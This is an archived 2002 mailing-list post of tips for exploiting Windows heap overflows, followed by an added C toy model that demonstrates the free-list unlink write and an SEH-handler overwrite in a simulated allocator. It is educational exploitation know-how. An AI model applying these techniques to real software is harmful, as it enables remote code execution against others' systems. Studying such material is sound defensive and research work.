Windows Heap Overflows In General

From: Brett Moore (brettat_private)
Date: Sun Dec 01 2002 - 18:03:04 PST


    Merry Christmas all, tis the month for knowledge sharing.
    
    Some tips and tricks when working with Windows heap based overflows to
    stimulate your mind.
    
    *) The more the merrier - If it lets you stuff it in there, stuff it.
    Different sizes, different characters can give different results.
    *) Running the exploit Local vs Remote can sometimes matter.
    *) The only state you can be sure of is that your request is not the first.
    But the only way to ensure this is by sending valid requests before the
    exploit. Numbers vary; find a minimum and it can help in the stability of
    overflows.
    *) Remember with heap based overflows you can write multiple sets of 4
    bytes. It's not the registers you are overflowing, but a structure. What do
    the other structure bytes control? Size does matter!
    http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0105.html
    *) Where's our code at? It's not just esp that holds important variable
    locations. Where do all those other numbers point?
    
    The first 3 allow you to write code that 99-100% of the time hits the spot.
    The last two allow you to write any relative jump instruction you need and
    set the SEH handler to your relative jump, thus 99-100% giving execution to
    your shellcode.
    
    Heyas to all who know.
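The mechanism behind the "multiple sets of 4 bytes" tip, as an added example that is not part of Brett's post: a toy C model of the free-list unlink in the classic NT heap of that era. Overflowing a busy chunk's user data overwrites the next chunk's header; when the busy chunk is freed and the allocator coalesces it with its free neighbour, the unlink performs two pointer-sized writes using the forged Flink/Blink values, so the attacker gets to write a chosen value at a chosen address (here a stand-in for the SEH handler slot). The chunk layout, the arena, `seh_slot`, `shellcode` and all function names are constructed for this example and are not the real `HEAP_ENTRY`/`HEAP_FREE_ENTRY` structures; on a 64-bit host the writes are 8 bytes rather than the 4 bytes of the 2002 targets.

```c
/* Toy model of the classic NT heap free-list unlink, constructed for this
 * example. Layout, arena, seh_slot and shellcode are stand-ins, not the real
 * HEAP_ENTRY / HEAP_FREE_ENTRY structures. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define UNIT 8                    /* sizes are counted in 8-byte units */
#define CHUNK_BUSY 0x01
#define CHUNK_BYTES 64            /* both toy chunks are 64 bytes */
#define HDR 8                     /* user data of a busy chunk starts here */

typedef struct chunk {
    uint16_t size;                /* whole chunk, in UNITs */
    uint16_t prev_size;
    uint8_t  flags;               /* CHUNK_BUSY set = allocated */
    uint8_t  unused[3];
    struct chunk *flink;          /* free chunks only: doubly linked free list */
    struct chunk *blink;
} chunk_t;

static union { uint64_t align; unsigned char bytes[256]; } arena; /* chunk A, then B */
#define heap (arena.bytes)
static chunk_t freelist;          /* list sentinel */
static chunk_t *seh_slot;         /* constructed stand-in for the SEH handler pointer */
static _Alignas(8) unsigned char shellcode[32]; /* stand-in payload, starts with jmp short */

/* The allocator's unlink: the two writes heap exploits of this era abused. */
static void unlink_chunk(chunk_t *c)
{
    chunk_t *f = c->flink, *b = c->blink;
    f->blink = b;                 /* write 1: *(flink + offsetof(blink)) = blink */
    b->flink = f;                 /* write 2: *(blink + offsetof(flink)) = flink */
}

/* free(): if the following chunk is free, coalesce with it, which unlinks it. */
static void toy_free(chunk_t *c)
{
    chunk_t *next = (chunk_t *)((unsigned char *)c + c->size * UNIT);
    c->flags &= (uint8_t)~CHUNK_BUSY;
    if (!(next->flags & CHUNK_BUSY))  /* the forged header bytes decide whether this fires */
        unlink_chunk(next);
    /* merging sizes and relinking c is omitted from the toy */
}

static void setup(void)
{
    chunk_t *a = (chunk_t *)heap, *b = (chunk_t *)(heap + CHUNK_BYTES);
    memset(&arena, 0, sizeof arena);
    a->size = CHUNK_BYTES / UNIT; a->flags = CHUNK_BUSY;
    b->size = CHUNK_BYTES / UNIT; b->prev_size = CHUNK_BYTES / UNIT;
    freelist.flink = freelist.blink = b;
    b->flink = b->blink = &freelist;
    seh_slot = NULL;
    memset(shellcode, 0x90, sizeof shellcode);
    /* write 2 lands at shellcode + offsetof(flink): hop over it with a short jmp */
    shellcode[0] = 0xEB;
    shellcode[1] = (unsigned char)(offsetof(chunk_t, flink) + sizeof(void *) - 2);
}

/* The attacker's buffer: filler for A's user area, then a forged header for B. */
static size_t build_payload(unsigned char *out, uint8_t flags, void *where, void *what)
{
    chunk_t fake;
    memset(&fake, 0, sizeof fake);
    fake.size = fake.prev_size = CHUNK_BYTES / UNIT;  /* keep size sane so free() finds B */
    fake.flags = flags;                                /* must not say "busy" */
    fake.flink = (chunk_t *)((unsigned char *)where - offsetof(chunk_t, blink));
    fake.blink = (chunk_t *)what;
    memset(out, 'A', CHUNK_BYTES - HDR);
    memcpy(out + CHUNK_BYTES - HDR, &fake, sizeof fake);
    return CHUNK_BYTES - HDR + sizeof fake;
}

/* Vulnerable copy into A's user area with no length check: runs on into B's header. */
static void vulnerable_copy(unsigned char *user, const unsigned char *in, size_t n)
{
    memcpy(user, in, n);
}

/* Overflow A with a forged header carrying `flags`, free A, and report whether
 * the SEH slot now points at the shellcode. */
int run(uint8_t flags)
{
    unsigned char payload[128];
    setup();
    size_t n = build_payload(payload, flags, &seh_slot, shellcode);
    vulnerable_copy(heap + HDR, payload, n);
    toy_free((chunk_t *)heap);
    return seh_slot == (chunk_t *)shellcode;
}

/* After run(): the jmp at offset 0 must land beyond the bytes write 2 clobbered. */
int jmp_clears_clobber(void)
{
    size_t clobber_end = offsetof(chunk_t, flink) + sizeof(void *);
    return shellcode[0] == 0xEB && 2u + shellcode[1] >= clobber_end;
}

int main(void)
{
    printf("free header forged: seh_slot -> shellcode? %d\n", run(0));
    printf("jmp skips clobbered bytes? %d\n", jmp_clears_clobber());
    printf("header marked busy:  seh_slot -> shellcode? %d\n", run(CHUNK_BUSY));
    return 0;
}
```

Two details in the toy are the ones the post is hinting at. Write 2 stores the forged Flink back into the shellcode at `offsetof(chunk_t, flink)`, which is why the first bytes of the shellcode are a relative jump over the damage rather than real code. And the flags byte of the overwritten header decides whether the coalesce (and so the unlink) happens at all: with `run(CHUNK_BUSY)` the same overflow writes nothing, which is the "what do the other structure bytes control" question in practice.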
    
    This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 00:09:09 PST